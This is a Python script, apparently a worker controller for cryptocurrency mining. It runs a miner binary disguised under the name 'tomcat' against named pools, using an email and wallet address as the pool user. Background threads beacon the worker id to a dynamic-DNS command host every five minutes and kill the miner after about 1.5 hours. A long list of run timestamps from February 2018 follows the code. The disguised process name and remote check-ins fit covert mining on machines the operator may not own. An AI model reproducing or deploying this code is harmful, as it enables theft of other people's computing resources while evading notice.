import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:56:06.464311
#2018-02-17 16:45:09.020486
#2018-02-17 18:32:06.887811
#2018-02-17 20:21:06.189588
#2018-02-17 22:08:04.838089
#2018-02-17 23:52:03.131347
#2018-02-18 01:42:03.832778
#2018-02-18 03:29:03.715881
#2018-02-18 05:17:03.605641
#2018-02-18 07:09:07.110111
#2018-02-18 08:57:05.009871
#2018-02-18 10:44:01.752750
#2018-02-18 12:32:06.543025
#2018-02-18 14:19:02.048346
#2018-02-18 16:10:02.064918
#2018-02-18 17:57:07.820813
#2018-02-18 19:44:03.681760
#2018-02-18 21:29:05.401022
#2018-02-18 23:18:06.030298
#2018-02-19 01:06:01.534990
#2018-02-19 02:52:06.620187
#2018-02-19 04:39:05.050069
#2018-02-19 06:23:07.001909
#2018-02-19 08:12:07.283606
#2018-02-19 10:01:09.095907
#2018-02-19 11:50:02.612036
#2018-02-19 13:38:01.649931
#2018-02-19 15:25:07.662156
#2018-02-19 17:13:01.307658
#2018-02-19 19:01:05.485705
#2018-02-19 20:47:01.548721
#2018-02-19 22:34:06.796046
#2018-02-20 00:19:07.320157
#2018-02-20 02:07:01.577087
#2018-02-20 03:56:05.207811
#2018-02-20 05:40:08.323852
#2018-02-20 07:26:08.166643
#2018-02-20 09:11:07.319016
#2018-02-20 10:54:10.556510
#2018-02-20 12:43:08.847268
#2018-02-20 14:29:02.174998
#2018-02-20 16:15:05.723592
#2018-02-20 18:01:01.581058
#2018-02-20 19:51:09.458753
#2018-02-20 21:40:06.071861
#2018-02-20 23:21:05.453970
#2018-02-21 01:05:02.811831
#2018-02-21 02:52:05.858068
#2018-02-21 04:39:03.850350
#2018-02-21 06:27:05.200813
#2018-02-21 08:13:01.883951
#2018-02-21 09:59:03.922018
#2018-02-21 11:47:06.910873
#2018-02-21 13:39:05.545162
#2018-02-21 15:23:08.654744
#2018-02-21 17:15:03.332648
#2018-02-21 19:02:03.800401
#2018-02-21 20:49:01.859157
#2018-02-21 22:33:07.098068
#2018-02-22 00:23:02.097010
#2018-02-22 02:10:01.712251
#2018-02-22 03:56:06.672428
#2018-02-22 05:43:07.644128
#2018-02-22 07:28:06.137428
#2018-02-22 09:16:07.048533
#2018-02-22 11:03:08.840059
#2018-02-22 12:48:10.208732
#2018-02-22 14:34:06.804907
#2018-02-22 16:20:09.358747
#2018-02-22 18:06:08.679893
#2018-02-22 19:56:06.730888
#2018-02-22 21:45:03.071173
#2018-02-22 23:32:07.129100
#2018-02-23 01:19:07.693595
#2018-02-23 03:06:01.452061
#2018-02-23 04:52:06.678832
#2018-02-23 06:38:05.265643
#2018-02-23 08:28:08.774587
#2018-02-23 10:43:01.388589
#2018-02-23 12:39:01.773217
#2018-02-23 14:23:08.814057
#2018-02-23 16:14:05.691800
#2018-02-23 18:02:01.734985
#2018-02-23 19:47:01.251313
#2018-02-23 21:29:05.981593
#2018-02-23 23:17:01.571962
#2018-02-24 01:07:04.564026
#2018-02-24 02:56:07.441778
#2018-02-24 04:44:07.141951
#2018-02-24 06:31:03.959546
#2018-02-24 08:19:05.340830
#2018-02-24 10:03:05.503717
#2018-02-24 12:01:06.559511
#2018-02-24 13:49:07.172793
#2018-02-24 15:31:03.789736
#2018-02-24 17:26:06.096103
#2018-02-24 19:13:04.078758
#2018-02-24 21:01:05.378607
#2018-02-24 23:33:06.190025
#2018-02-25 02:55:06.691928
#2018-02-25 07:00:05.685146